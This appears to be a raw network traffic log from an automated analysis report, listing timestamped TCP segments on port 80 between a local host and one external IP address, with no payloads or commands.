Dec 12, 2024 16:48:48.738497972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.738545895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.738781929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.738842964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.738889933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.739945889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.740051985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.740111113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.740798950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.740845919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.740849972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.741751909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.742007971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.881083965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.881143093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.881208897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.881736040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.881859064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.881917953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.882886887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.883076906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.883210897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.883580923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.883737087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.883793116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.884673119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.884857893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.885742903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.885813951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.885832071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.885873079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.886814117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.886992931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.887034893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.887898922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.888089895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.888164043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.888899088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.889005899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.889074087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.890252113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.890403032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.890461922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.890779972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.890882969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.890942097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.891735077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.891900063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.891953945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.892735958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.892894030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.893073082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.893822908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.894026041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.894113064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.894830942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.895006895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.895067930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.895869017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.896014929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.896070957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.896783113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.896965027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.897026062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.897794962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.897849083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.898310900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.898839951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.899158001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.899219036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.899892092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.899990082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.900419950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.900876999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.901161909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.901232958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.901886940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.902024031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.902791023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.902863979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.902966976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.903979063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.904052973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.904087067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.904921055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.904992104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.905002117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.905034065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.905973911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.906106949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.906146049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.906920910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.907053947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.907092094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.907954931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.908004999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.908960104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.909018040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.909051895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.909882069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.910010099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.910084963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.910115957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.911004066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.911124945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.911186934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.912131071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.912257910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.913026094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.913085938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.913177013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.914061069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.914099932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.914110899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.914144993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.915060997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.915129900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.915188074 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.916093111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.916292906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.916351080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.917098999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.917192936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.918164968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.918209076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.918253899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.919081926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.919208050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.919214010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.919265985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.920157909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.920368910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.920435905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.921113968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.921216011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.921253920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.922142982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.922249079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.922305107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.923158884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.923275948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.923480988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.924201965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.924302101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.925185919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.925246000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.925292015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.925828934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.926246881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.926323891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.926414967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.927241087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.927340984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.927388906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.928278923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.928381920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.928446054 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.929235935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.929303885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.930176020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.930301905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.930385113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.930538893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.931283951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.931410074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.932298899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.932339907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.932343006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.932377100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.933309078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.933362961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.933403969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.934283972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.009721041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.073879957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.073896885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.073977947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.074135065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.074240923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.074297905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.075160027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.075248957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.075328112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.076190948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.076251030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.077187061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.077248096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.077306986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.077349901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.078304052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.078373909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.078434944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.079216957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.079339027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.079602957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.080248117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.080354929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.080408096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.081254959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.081399918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.081465960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.082268953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.082405090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.082461119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.083283901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.083405972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.083457947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.084342957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.084462881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.084515095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.085319996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.085392952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.085455894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.086432934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.086865902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.086955070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.087387085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.087553978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.087632895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.088387012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.088543892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.088596106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.089426994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.089561939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.089658976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.090415001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.090548038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.090615034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.091407061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.091480970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.091573954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.092422962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.092551947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.092636108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.093461037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.093545914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.094476938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.094563961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.094594002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.094948053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.095482111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.095593929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.095668077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.096518040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.096616983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.096805096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.097522974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.097620010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.098454952 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.098529100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.098710060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.098759890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.099579096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.099673986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.099750042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.100608110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.100802898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.101572037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.101635933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.101665974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.102247000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.102575064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.102763891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.102861881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.103596926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.103710890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.103795052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.104777098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.104840994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.105072021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.105674982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.105762959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.105859995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.106645107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.106775999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.106836081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.107636929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.107717037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.107779980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.108639956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.108762980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.108834028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.109698057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.109853983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.109926939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.110688925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.110831022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.110951900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.111711025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.111901999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.111973047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.112718105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.112736940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.112792969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.113733053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.113883018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.113943100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.114764929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.114880085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.114950895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.115772009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.115884066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.115981102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.116769075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.116897106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.116997004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.117795944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.117911100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.117978096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.118827105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.118957043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.119040012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.119818926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.119944096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.120044947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.120825052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.120987892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.121110916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.121850014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.121902943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.121975899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.122848988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.122973919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.123034954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.123872042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.123995066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.124062061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.124881983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.124984980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.125055075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.125943899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.126066923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.126122952 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.126934052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.197227001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.266360998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.266393900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.266482115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.266792059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.267003059 CET	80	49946	185.81.68.147	192.168.2.10
